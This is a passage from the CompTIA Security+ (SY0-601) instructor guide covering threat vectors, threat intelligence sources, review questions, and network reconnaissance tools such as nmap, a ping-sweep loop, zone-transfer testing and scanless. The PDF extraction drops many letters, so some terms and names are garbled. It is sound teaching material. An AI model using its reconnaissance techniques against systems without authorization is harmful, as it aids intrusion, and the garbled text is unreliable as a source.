engineering techni ues to persuade or trick the user into opening the attachment.

• emote and wireless the attacker either obtains credentials for a remote access
or wireless connection to the network or cracks the security protocols used for
authentication. Alternatively, the attacker spoofs a trusted resource, such as an
access point, and uses it to perform credential harvesting and then uses the stolen
account details to access the network.

• Supply chain rather than attack the target directly, a threat actor may seek
ways to infiltrate it via companies in its supply chain. ne high profile e ample of
this is the Target data breach, which was made via the company's AC supplier
krebsonsecurity.com target hackers broke in via hvac company .

• eb and social media malware may be concealed in files attached to posts or

presented as downloads. An attacker may also be able to compromise a site so that
it automatically infects vulnerable browser software a drive by download . ocial
media may also be used more subtly, to reinforce a social engineering campaign
and drive the adoption of Tro ans.

• Cloud many companies now run part or all of their network services via Internet
accessible clouds. The attacker only needs to find one account, service, or host with
weak credentials to gain access. The attacker is likely to target the accounts used to
develop services in the cloud or manage cloud systems. They may also try to attack
the cloud service provider C as a way of accessing the victim system.

ophisticated threat actors will make use of multiple vectors. They are likely to plan a
multi stage campaign, rather than a single smash and grab type of raid.

esson Explaining Threat Actors and Threat Intelligence | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 24 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Threat Actor Types and Attack Vectors
Answer the following uestions

1. Which of the following would be assessed by likelihood and impact:

vulnerability, threat, or risk?

isk. To assess likelihood and impact, you must identify both the vulnerability and the
threat posed by a potential e ploit.

2. True or false? Nation state actors primarily only pose a risk to other states.

alse nation state actors have targeted commercial interests for theft, espionage, and
e tortion.

3. You receive an email with a screenshot showing a command prompt at one

of your application servers. The email suggests you engage the hacker for
a day's consultancy to patch the vulnerability. How should you categorize
this threat

This is either gray hat semi authori ed hacking or black hat non authori ed hacking.
If the re uest for compensation via consultancy is an e tortion threat if refused, the
hacker sells the e ploit on the dark web , then the motivation is purely financial gain
and can be categori ed as black hat. If the consultancy is refused and the hacker takes
no further action, it can be classed as gray hat.

4. Which type of threat actor is primarily motivated by the desire for

social chan e

acktivist.

5. Which three types of threat actor are most likely to have high levels
o undin

tate actors, criminal syndicates, and competitors.

6. You are assisting with writing an attack surface assessment report for a
small company. Following the CompTIA syllabus, which two potential attack
vectors have been omitted from the following headings in the report? Direct
access, Email, Remote and wireless, Web and social media, Cloud.

emovable media and supply chain.

esson Explaining Threat Actors and Threat Intelligence | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 25

Topic 2B
Explain Threat Intelligence Sources

EXAM OBJECTIVES COVERED Teaching

1. Explain different threat actors, vectors, and intelligence sources Tip
se of threat
intelligence sources
is a new area of
As a security professional, you must continually refresh and e pand your knowledge of focus for the e am,
both security technologies and practices and adversary tactics and techni ues. As well and will be a critical
as staying up to date on a personal level, you will also need to select and deploy threat tool throughout the
intelligence platforms. ou need to be able to identify and evaluate sources of threat candidates' careers.
intelligence and research and to use these resources to enhance security controls. This topic covers
the remaining
Threat Research Sources content e amples for
ob ective . .
Threat research is a counterintelligence gathering e ort in which security companies
and researchers attempt to discover the tactics, techni ues, and procedures TT s Show Slide(s)
of modern cyber adversaries. There are many companies and academic institutions
engaged in primary cybersecurity research. ecurity solution providers with firewall
Threat esearch
and anti malware platforms derive a lot of data from their own customers' networks. ources
As they assist customers with cybersecurity operations, they are able to analy e and
publici e TT s and their indicators. These organi ations also operate honeynets to try Teaching
to observe how hackers interact with vulnerable systems. Tip
ive an overview
Another primary source of threat intelligence is the dark web. The deep web is any
of the purpose of
part of the orld ide eb that is not inde ed by a search engine. This includes pages threat intelligence,
that re uire registration, pages that block search inde ing, unlinked pages, pages using introducing the
non standard DN , and content encoded in a non standard manner. ithin the deep term TT . plain
web, are areas that are deliberately concealed from regular browser access. which companies
and institutions are
• Dark net a network established as an overlay to Internet infrastructure by active in this type of
software, such as The nion outer T , reenet, or I , that acts to anonymi e research.
usage and prevent a third party from knowing about the e istence of the network Make sure students
or analy ing any activity taking place over the network. nion routing, for instance, know how to access
uses multiple layers of encryption and relays between nodes to achieve this dark web sites and
the difficulty of
anonymity.
performing research.
• Dark web sites, content, and services accessible only over a dark net. hile there
are dark web search engines, many sites are hidden from them. Access to a dark
web site via its L is often only available via word of mouth bulletin boards.

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 26 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Threat Intelligence
roviders
Teaching
Tip
Note the ways
in which threat
intelligence can be
consumed. plain
that the market is a
mi ture of platform
providers with
proprietary feeds,
commercial platform
providers with open
source feeds, open
source platforms and
feeds, and open
source feeds with no
associated platform.
esson Explaining Threat Actors and Threat Intelligence | Topic
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Using the TO browser to view the Alpha ay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)
Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and webstores that have been set up to e change
stolen data and hacking tools. As adversaries react to this, they are setting up new
networks and ways of identifying law enforcement infiltration. Conse uently, dark nets
and the dark web represent a continually shifting landscape.
Threat Intelligence Providers
The outputs from the primary research undertaken by security solutions providers and
academics can take three main forms
• ehavioral threat research narrative commentary describing e amples of attacks
and TT s gathered through primary research sources.
• Reputational threat intelligence lists of I addresses and domains associated
with malicious behavior, plus signatures of known file based malware.
• Threat data computer data that can correlate events observed on a customer's
own networks and logs with known TT and threat actor indicators.
Threat data can be packaged as feeds that integrate with a security information and
event management I M platform. These feeds are usually described as cyber
threat intelligence (CTI) data. The data on its own is not a complete security solution
however. To produce actionable intelligence, the threat data must be correlated with
observed data from customer networks. This type of analysis is often powered by
artificial intelli ence AI features of the I M.
Threat intelligence platforms and feeds are supplied as one of three di erent
commercial models
• Closed/proprietary the threat research and CTI data is made available as a paid
subscription to a commercial threat intelligence platform. The security solution
provider will also make the most valuable research available early to platform
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 27

subscribers in the form of blogs, white papers, and webinars. ome e amples of
such platforms include

• I M orce change e change. force.ibmcloud.com

• ire ye fireeye.com solutions cyber threat intelligence threat intelligence

subscriptions.html

• ecorded uture recordedfuture.com solutions threat intelligence feeds

I - orce Exchange threat intelligence portal. (Image copyright 01 I Security

exchange.xforce.ibmcloud.com.)

• endor websites proprietary threat intelligence is not always provided at cost. All
types of security, hardware, and software vendors make huge amounts of threat
research available via their websites as a general benefit to their customers. ne
e ample is Microsoft's ecurity Intelligence blog microsoft.com security blog
microsoft security intelligence .

• ublic private information sharing centers in many critical industries, Information

Sharing and Analysis Centers (ISACs) have been set up to share threat intelligence
and promote best practice nationalisacs.org member isacs . These are sector
specific resources for companies and agencies working in critical industries, such
as power supply, financial markets, or aviation. here there is no coverage by an
I AC, local industry groups and associations may come together to provide mutual
support.

• Open source intelligence (OSINT) some companies operate threat intelligence

services on an open source basis, earning income from consultancy rather than
directly from the platform or research e ort. ome e amples include

• AT T ecurity, previously Alien ault pen Threat change T

ot .alienvault.com

• Malware Information haring ro ect MI misp pro ect.org feeds

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 28 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• pamhaus spamhaus.org organi ation

• irusTotal virustotal.com

As well as referring to open-source threat research providers, OSI T can mean any
intelligence derived from publicly available information. OSI T is a common reconnaissance
techni ue where the attacker harvests domains, IP address ranges, employees, and other
data that will assist in identifying attack vectors. Companies should also monitor public
networks for signs of attack planning (chatter on forums) and breaches (confidential
information or account credentials posted to online forums). ost commercial providers
offer monitoring services, which can include dark web sources (fireeye.com content dam
fireeye-www products pdfs pf intel ds-digital-threat-monitoring.pdf).

Show Slide(s) Other Threat Intelligence Research Sources

ther Threat
Intelligence esearch
ources
Teaching
Tip
ou should not need
to spend too long
on this ust make
students aware of
these sources.
There are plenty of other sources of best practice advice and new research other than
the threat intelligence platforms
• Academic ournals results from academic researchers and not for profit trade
bodies and associations, such as the I , are published as papers in ournals.
Access to these papers is usually subscription based. ne free source is the ar iv
preprint repository ar iv.org list cs.C recent . reprints are papers that have not
been published or peer reviewed.
• Conferences security conferences are hosted and sponsored by various
institutions and provide an opportunity for presentations on the latest threats and
technologies.

• e uest for Comments C when a new technology is accepted as a web

standard, it is published as an C by the C rfc editor.org . There are also
informational Cs covering many security considerations and best practices.

• ocial media companies and individual researchers and practitioners write

informative blogs or social media feeds. There are too many useful blog and
discussion sources to include here, but the list curated by Digital uardian
digitalguardian.com blog top infosec blogs you should be reading is a good
starting point.

As well as a source of information, social media should also be monitored for threat data
(trendmicro.com vinfo us security news cybercrime-and-digital-threats hunting-threats-on-
twitter).

Show Slide(s) Tactics, Techniques, and Procedures and

Indicators of Compromise
Tactics, Techni ues,
and rocedures A tactic, technique, or procedure (TTP) is a generali ed statement of adversary
and Indicators of behavior. The term is derived from military doctrine mwi.usma.edu what is army
Compromise
doctrine . TT s categori e behaviors in terms of campaign strategy and approach
Teaching tactics , generali ed attack vectors techni ues , and specific intrusion tools and
Tip methods procedures .
Make sure students An indicator of compromise (IoC) is a residual sign that an asset or network has
can use this been successfully attacked or is continuing to be attacked. ut another way, an IoC is
terminology. evidence of a TT .

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 29

TTPs describe what and how an adversary acts and Indicators describe how to recognize
what those actions might look like. sti pro ect.github.io documentation concepts
ttp vs indicator
As there are many di erent targets and vectors of an attack, so too are there many
di erent potential IoCs. The following is a list of some IoCs that you may encounter
• nauthori ed software and files

• uspicious emails

• uspicious registry and file system changes

• nknown port and protocol usage

• cessive bandwidth usage

• ogue hardware

• ervice disruption and defacement

• uspicious or unauthori ed account usage

An IoC can be definite and ob ectively identifiable, like a malware signature, but often
IoCs can only be described with confidence via the correlation of many data points. Show Slide(s)
ecause these IoCs are often identified through patterns of anomalous activity rather
than single events, they can be open to interpretation and therefore slow to diagnose.
Threat Data eeds
Conse uently, threat intelligence platforms use AI backed analysis to speed up
detection without overwhelming analysts' time with false positives.
Teaching
Tip
Strictly speaking, an IoC is evidence of an attack that was successful. The term indicator of
Make sure students
attack (IoA) is sometimes also used for evidence of an intrusion attempt in progress.
can distinguish TI
and TA II.
Note that we'll
cover vulnerability
Threat Data Feeds assessment in the
ne t lesson.
hen you use a cyber threat intelligence CTI platform, you subscribe to a threat data
Interaction
feed. The information in the threat data can be combined with event data from your
Opportunity
own network and system logs. An analysis platform performs correlation to detect
whether any IoCs are present. There are various ways that a threat data feed can be ou can show some
other threat map
implemented.
e amples, such
as Check oint's
Structured Threat Information eXpression (STIX) threatmap.
checkpoint.com .
The A I CTI framework oasis open.github.io cti documentation is designed to aspersky's is visually
provide a format for this type of automated feed so that organi ations can share CTI. impressive too
The Structured Threat Information eXpression (STIX) part of the framework describes cybermap.kaspersky.
standard terminology for IoCs and ways of indicating relationships between them. com .

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 30 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

STI elationship example. (Icon images Copyright 016 ret ordan. icensed under the Creative
Commons Attribution-ShareAlike (CC Y-SA) icense, ersion .0. (freetaxii.github.io stix -icons.html.)

here TI provides the synta for describing CTI, the Trusted Automated eXchange
of Indicator Information (TAXII) protocol provides a means for transmitting CTI data
between servers and clients. or e ample, a CTI service provider would maintain a
repository of CTI data. ubscribers to the service obtain updates to the data to load
into analysis tools over TA II. This data can be re uested by the client referred to as a
collection , or the data can be pushed to subscribers referred to as a channel .

Automated Indicator Sharing (AIS)

Automated Indicator Sharing (AIS) is a service o ered by the Department of
omeland ecurity D for companies to participate in threat intelligence sharing
us cert.gov ais . It is especially aimed at I ACs, but private companies can oin too. AI
is based on the TI and TA II standards and protocols.

Threat Maps
A threat map is an animated graphic showing the source, target, and type of attacks
that have been detected by a CTI platform. The security solutions providers publish
such maps showing global attacks on their customers' systems fortinet.com
fortiguard threat intelligence threat map .

File/Code Repositories
A file code repository such as virustotal.com holds signatures of known malware code.
The code samples derive from live customer systems and for public repositories files
that have been uploaded by subscribers.

Vulnerability Databases and Vulnerability Feeds

As well as analy ing adversary tools and behaviors, another source of threat
intelligence is identifying vulnerabilities in , software application, and firmware
code. ecurity researchers look for vulnerabilities, often for the reward of bug bounties
o ered by the vendor. Lists of vulnerabilities are stored in databases such as Common
Vulnerabilities and Exposures (CVE), operated by Mitre cve.mitre.org . Information
about vulnerabilities is codified as signatures and scanning scripts that can be supplied
as feeds to automated vulnerability scanning software.

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 31

Artificial Intelli ence and redicti e Anal sis Show Slide(s)

A threat data feed does not produce threat intelligence automatically. The combination Artificial Intelligence
of security intelligence and CTI data can be processed, correlated, and analy ed to and redictive Analysis
provide actionable insights that will assist you in identifying security problems. or
e ample, security intelligence reveals that DDo attacks were perpetrated against your Teaching
web services from a range of I addresses by collecting log and network traffic data. Tip
Threat intelligence associates those I addresses with a hacktivist group. y linking Note that security
the two sources of intelligence, you can identify goals and tactics associated with that tools are increasingly
group and use controls to mitigate further attacks. Most threat intelligence platforms making use of AI and
use some sort of artificial intelligence AI to perform correlation analysis. ML techni ues. e will
be referring to these
again when looking
AI and Machine Learning at I M and A
analytics and incident
AI is the science of creating machine systems that can simulate or demonstrate a response.
similar general intelligence capability to humans. arly types of AI e pert systems
use if then rules to draw inferences from a limited data set, called a knowledge base.
Machine learning (ML) uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an ob ect as a type, working out the
best ne t move in a game, and so on. nlike an e pert system, machine learning can
modify the algorithms it uses to parse data and develop strategies. It can make gradual
improvements in the decision making processes. The structure that facilitate this
learning process is referred to as an artificial neural network ANN . Nodes in a neural
network take inputs and then derive outputs, using comple feedback loops between
nodes. An ML system has ob ectives and error states and it ad usts its neural network
to reduce errors and optimi e ob ectives.
In terms of threat intelligence, this AI backed analysis might perform accurate
correlations that would take tens or hundreds of hours of analyst time if the data were
to be e amined manually.

Predictive Analysis
Identifying the signs of a past attack or the presence of live attack tools on a network
uickly is valuable. owever, one of the goals of using AI backed threat intelligence is
to perform predictive analysis, or threat forecasting. This means that the system can
anticipate a particular type of attack and possibly the identity of the threat actor before
the attack is fully reali ed. or e ample, the system tags references to a company,
related I addresses, and account names across a range of ingested data from dark
web sources, web searches, social media posts, phishing email attempts, and so on.
The analysis engine associates this chatter with I addresses that it can correlate with
a known adversary group. This gives the target advance warning that an attack is in the
planning stages and more time to prepare an e ective defense.
uch concrete threat forecasting is not a proven capability of any commercial threat
intelligence platform at the time of writing. owever, predictive analysis can inform risk
assessment by giving more accurate, uantified measurements of the likelihood and
impact cost of breach type events.

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 32 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Threat Intelligence Sources
Answer the following uestions

1. You are consulting on threat intelligence solutions for a supplier of

electronic voting machines. What type of threat intelligence source would
produce the most relevant information at the lowest cost?

or critical infrastructure providers, threat data sharing via an Information haring and
Analysis Center I AC is likely to be the best option.

2. Your CEO wants to know if the company's threat intelligence platform

ma es e ecti e use o I T hat is I T

pen source intelligence INT is cybersecurity relevant information harvested from

public websites and data records. In terms of threat intelligence specifically, it refers to
research and data feeds that are made publicly available.

3. You are assessing whether to join AIS. What is AIS and what protocol should
your SIEM support in order to connect to AIS servers?

Automated Indicator haring AI is a service o ered by the Department of omeland

ecurity D for participating in threat intelligence sharing. AI uses the Trusted
Automated e change of Indicator Information TA II protocol as a means of
transmitting CTI data between servers and clients.

esson Explaining Threat Actors and Threat Intelligence | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 33

Lesson 2
Summary
ou should be able to e plain how to assess e ternal and insider threat actor types Teaching
in terms of intent and capability. ou should also be able to summari e options for Tip
implementing threat intelligence platforms and data sources. Check that students
are confident about
the content that has
Guidelines for Explaining Threat Actors and been covered. If there
Threat Intelli ence is time, re visit any
content e amples that
ollow these guidelines when you assess the use of threat research and analysis they have uestions
about. If you have
• Create a profile of threat actor types that pose the most likely threats to your used all the available
business. emember that you may be targeted as the supplier to a larger enterprise. time for this lesson
block, note the issues,
• Identify sources of threat research, especially those that are directly relevant to your and schedule time for
industry sector. chedule time to keep up to date with threat trends and security a review later in the
course.
best practices.
Interaction
• valuate the use of a threat intelligence platform, considering proprietary versus
Opportunity
open source options.
ptionally, discuss
• valuate the use of di erent proprietary and open source threat data feeds, with students how
considering that sector specific data might be of most use. threat intelligence
platforms and data
feeds could be used
within their own
workplaces, or how
these resources
have already been
implemented, and
how successful they
have proved.

esson Explaining Threat Actors and Threat Intelligence

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 3
Performing Security Assessments

LESSON INTRODUCTION Teaching

Tip
Security assessment refers to processes and tools that evaluate the attack surface. This lesson continues
With knowledge of adversary tactics and capabilities, you can assess whether points on the assessment theme
the attack surface are potentially vulnerable attack vectors. The output of assessment by looking at specific
is recommendations for deploying, enhancing, or reconfiguring security controls to tools, vulnerability
mitigate the risk that vulnerabilities are e ploitable by threat actors. assessment, and
penetration testing.

Lesson Objectives
In this lesson, you will:
• Assess organizational security with network reconnaissance tools.

• Explain security concerns with general vulnerability types.

• Summarize vulnerability scanning techniques.

• Explain penetration testing concepts.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 36 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 3A
Assess Organizational Security with
Network Reconnaissance Tools

Teaching EXAM OBJECTIVES COVERED

Tip 4.1 Given a scenario, use the appropriate tool to assess organizational security
This topic covers
the network
reconnaissance
Reconnaissance is a type of assessment activity that maps the potential attack surface
and packet capture
sections of objective by identifying the nodes and connections that make up the network. You will often
4.1. Other content need to run scans using both command-line and GUI topology discovery tools. You
examples from will need to report host configurations using fingerprinting tools and capture and
this objective are analy e network traffic. ou should also understand how tools can be used to operate
discussed elsewhere backdoor connections to a host and to covertly e filtrate data.
in the course.
There are a lot of tools
to get through, but ipconfi pin and arp
hopefully many of
them will be familiar The process of mapping out the attack surface is referred to as network
to students with reconnaissance and discovery. Reconnaissance techniques can are used by threat
Network+ experience. actors, but they are also be used by security professionals to probe and test their own
Note the relevance of
security systems, as part of a security assessment and ongoing monitoring.
each tool to security
assessment. Topology discovery (or " ootprintin ") means scanning for hosts, IP ranges, and routes
between networks to map out the structure of the target network. Topology discovery
ho lide s can also be used to build an asset database and to identify non-authorized hosts
rogue system detection or network configuration errors.
ipconfig, ping, and arp
Basic topology discovery tasks can be accomplished using the command-line tools
built into indows and Linu . The following tools report the I configuration and test
Teaching
connectivity on the local network segment or subnet.
Tip
Focus on uses rather • ipconfi show the configuration assigned to network interface s in indows,
than switches. including the hardware or media access control (MAC) address, IPv4 and IPv6
Encourage students addresses, default gateway, and whether the address is static or assigned by DHCP.
to learn syntax and If the address is DHCP-assigned, the output also shows the address of the DHCP
options through server that provided the lease.
practice.
If students are • i confi show the configuration assigned to network interface s in Linu .
not confident
with networking • ping—probe a host on a particular IP address or host name using Internet Control
fundamentals, you essa e rotocol IC . You can use ping with a simple script to perform
might want to skip this
a sweep of all the IP addresses in a subnet. The following example will scan the
section and come back
to it after lesson 9. 10.1.0.0/24 subnet from a Windows machine:
for /l %i in (1,1,255) do @ping -n 1 -w 100
10.1.0.%i | find /i "reply"

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 37

Performing a ping sweep in indows with a or loop Searching multiple octets re uires nested loops.
ote that not all hosts respond to IC P probes. (Screenshot used with permission from icrosoft.)

• arp—display the local machine's Address Resolution Protocol (ARP) cache.

The ARP cache shows the AC address of the interface associated with each IP
address the local host has communicated with recently. This can be useful if you
are investigating a suspected spoofing attack. or e ample, a sign of a man in the
middle attack is where the MAC address of the default gateway IP listed in the cache
is not the legitimate router's MAC address.

or more information about commands, including syntax usage, look up the command in
an online resource for indows (docs.microsoft.com en-us windows-server administration
windows-commands windows-commands) or inux (linux.die.net man).

route and traceroute ho lide s

The following tools can be used to test the routing configuration and connectivity with route and traceroute
remote hosts and networks.
• route view and configure the host's local routing table. Most end systems use a
default route to forward all traffic for remote networks via a gateway router. If the
host is not a router, additional entries in the routing table could be suspicious.

Output from the route command on a inux host. ost endpoints have a simple routing table, similar
to this. It shows the default route (0.0.0.0 0) via the host configured as the default gateway (10.1.0. )
over the network interface eth0. The second line of the table shows the subnet for local traffic
(10.1.0.0 ). This network is directly connected, represented by the 0.0.0.0 gateway.

• tracert—uses ICMP probes to report the round trip time (RTT) for hops between the
local host and a host on a remote network. tracert is the Windows version of
the tool.

• traceroute—performs route discovery from a Linux host. traceroute uses UDP

probes rather than ICMP, by default.

• pathping—provides statistics for latency and packet loss along a route over a
longer measuring period. pathping is a Windows tool; the equivalent on Linux
is mtr.

In a security context, high latency at the default gateway compared to a baseline might
indicate a man-in-the-middle attack. High latency on other hops could be a sign of
denial or service, or could just indicate network congestion.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 38 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

In inux, commands such as ifconfig, arp, route, and traceroute are deprecated and
the utilities have not been updated for some years. The iproute suite of tools supply
replacements for these commands (digitalocean.com community tutorials how-to-use-
iproute -tools-to-manage-network-configuration-on-a-linux-vps).

ho lide s I canners and map

IP Scanners and Nmap
Scanning a network using tools such as ping is time consuming and non-stealthy,
and does not return detailed results. Most topology discovery is performed using
Teaching a dedicated I scanner tool. An I scanner performs host discovery and identifies
Tip how the hosts are connected together in an internetwork. For auditing, there are
Students shouldn't enterprise suites, such as Microsoft's System Center products. Such suites can be
need detailed provided with credentials to perform authorized scans and obtain detailed host
knowledge of information via management protocols, such as the imple et or ana ement
Nmap switches but rotocol .
make sure they can
distinguish host The map ecurit canner (nmap.org) is one of the most popular open-source
discovery and service/ IP scanners. Nmap can use diverse methods of host discovery, some of which can
OS discovery scanning. operate stealthily and serve to defeat security mechanisms such as firewalls and
intrusion detection. The tool is open-source software with packages for most versions
of Windows, Linux, and macOS. It can be operated with a command line or via a GUI
(Zenmap).
The basic syntax of an Nmap command is to give the IP subnet (or IP host address)
to scan. When used without switches like this, the default behavior of Nmap is to
ping and send a TCP ACK packet to ports 80 and 443 to determine whether a host is
present. On a local network segment, Nmap will also perform ARP and ND (Neighbor
Discovery) sweeps. If a host is detected, Nmap performs a port scan against that host
to determine which services it is running.

map default scan listing open ports from within the default range. (Screenshot map nmap.org.)

This OS fingerprinting can be time-consuming on a large IP scope and is also non-stealthy. If

you want to perform only host discovery, you can use map with the -sn switch (or -sP in
earlier versions) to suppress the port scan.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 39

er ice isco er and map ho lide s

aving identified active I hosts on the network and gained an idea of the network ervice Discovery and
topology, the next step in network reconnaissance is to work out which operating Nmap
systems are in use, which network services each host is running, and, if possible,
which application software is underpinning those services. This process is described as Teaching
ser ice disco er . ervice discovery can also be used defensively, to probe potential Tip
rogue systems and identify the presence of unauthorized network service ports. Remind students that
these techniques
er ice isco er ith map can be used
defensively (auditing)
When Nmap completes a host discovery scan, it will report on the state of each port or o ensively
scanned for each IP address in the scope. At this point, you can run additional service (reconnaissance).
discovery scans against one or more of the active IP addresses. Some of the principal
options for service discovery scans are:
• TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as
the scanning host requests a connection without acknowledging it. The target's
response to the scan's N packet identifies the port state.

• UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap needs to wait
for a response or timeout to determine the port state, so UDP scanning can take a
long time. A UDP scan can be combined with a TCP scan.

• Port range (-p)—by default, Nmap scans 1000 commonly used ports, as listed in its
configuration file. se the -p argument to specify a port range.

er ice and ersion etection and in erprintin ith map

The detailed analysis of services on a particular host is often called fin erprintin . This
is because each OS or application software that underpins a network service responds
to probes in a unique way. This allows the scanning software to guess at the software
name and version, without having any sort of privileged access to the host. This can
also be described as banner grabbing, where the banner is the header of the response
returned by the application.
When services are discovered, you can use Nmap with the -sV or -A switch to probe
a host more intensively to discover the following information:
• Protocol—do not assume that a port is being used for its "well known" application
protocol. Nmap can scan traffic to verify whether it matches the e pected signature
(HTTP, DNS, SMTP, and so on).

• Application name and version—the software operating the port, such as Apache
web server or Internet Information Services (IIS) web server.

• OS type and version—use the -o switch to enable fingerprinting or -A to use

both fingerprinting and version discovery .

• Device type—not all network devices are PCs. Nmap can identify switches and
routers or other types of networked devices, such as NAS boxes, printers, and
webcams.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 40 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

map fingerprinting scan results. (Screenshot map nmap.org.)

Nmap comes with a database of application and version fingerprint signatures,

classified using a standard synta called Common latform numeration C .
Unmatched responses can be submitted to a web URL for analysis by the community .

ho lide s netstat and nsloo up

netstat and nslookup
Basic service discovery tasks can also be performed using tools built into the Windows
and Linux operating systems:
Teaching
• netstat—show the state of TCP/UDP ports on the local machine. The same
Tip
command is used on both indows and Linu , though with di erent options synta .
Hopefully students You can use netstat to check for service misconfigurations perhaps a host is
will be familiar with
the basic operation
running a web or FTP server that a user installed without authorization). You may
of these tools from also be able to identify suspect remote connections to services on the local host or
Network+. from the host to remote IP addresses. If you are attempting to identify malware, the
most useful netstat output is to show which process is listening on which ports.

netstat command running on indows showing activity during an nmap scan. The findstr function
is being used to filter the output (to show only connections from IPv hosts on the same subnet).
(Screenshot used with permission from icrosoft.)

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 41

On Linux, use of netstat is deprecated in favor of the ss command from the iptools suite
(linux.com topic networking introduction-ss-command).

• nsloo up/di —query name records for a given domain using a particular DNS
resolver under Windows (nslookup) or Linux (dig). An attacker may test a
network to find out if the DN service is misconfigured. A misconfigured DN may
allow a zone transfer, which will give the attacker the complete records of every host
in the domain, revealing a huge amount about the way the network is configured.

Testing whether the name server for comptia.org will allow a zone transfer.
(Screenshot used with permission from icrosoft.)

ther econnaissance and isco er Tools ho lide s

There are hundreds of tools relevant to security assessments, network reconnaissance, Other Reconnaissance
vulnerability scanning, and penetration testing. Security distributions specialize in and Discovery Tools
bundling these tools for Linux—notably KALI (kali.org) plus ParrotOS (parrotlinux.org)—
and Windows (fireeye.com blog threat research commando vm windows Teaching
o ensive distribution.html). Tip
There is only space
the ar ester for brief overviews of
these tools, though
the ar ester is a tool for gathering open-source intelligence (OSINT) for a particular we will be examining
domain or company name (github.com/laramies/theHarvester). It works by scanning vulnerability scanners
multiple public data sources to gather emails, names, subdomains, IPs, URLs and other in more detail later in
the lesson.
relevant data.

dnsenum
While you can use tools such as dig and whois to query name records and hosting
details and to check that external DNS services are not leaking too much information,
a tool such as dnsenum packages a number of tests into a single query (github.com/
fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can
try to work out the IP address ranges that are in use.

scanless
ort scannin is difficult to conceal from detection systems, unless it is performed
slowly and results gathered over an extended period. Another option is to disguise the
source of probes. To that end, scanless is a tool that uses third-party sites (github.com/
vesche/scanless). This sort of tool is also useful for in a defensive sense by scanning for
ports and services that are open, but shouldn't be.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 42 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

curl
curl is a command-line client for performing data transfers over many types of
protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT
requests as part of web application vulnerability testing. curl supports many other
data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.

essus
The list of services and version information that a host is running can be cross-
checked against lists of known software vulnerabilities. This type of scanning is
usually performed using automated tools. essus, produced by Tenable Network
Security (tenable.com/products/nessus/nessus-professional), is one of the best-known
commercial vulnerability scanners. It is available in on-premises (Nessus Manager)
and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed
for smaller networks. The product is free to use for home users but paid for on a
subscription basis for enterprises. As a previously open-source program, Nessus also
supplies the source code for many other scanners.

ho lide s ac et Capture and tcpdump

Packet Capture and
Packet and protocol analysis is another crucial security assessment and monitoring
tcpdump process:

Teaching
• ac et anal sis refers to deep-down frame-by-frame scrutiny of captured frames.
Tip • rotocol anal sis means using statistical tools to analyze a sequence of packets, or
Make sure students packet trace.
understand what
information can be acket and protocol analysis depends on a sni er tool to capture and decode the
gathered depending frames of data. Network traffic can be captured from a host or from a network
on where the host/
sensor running the
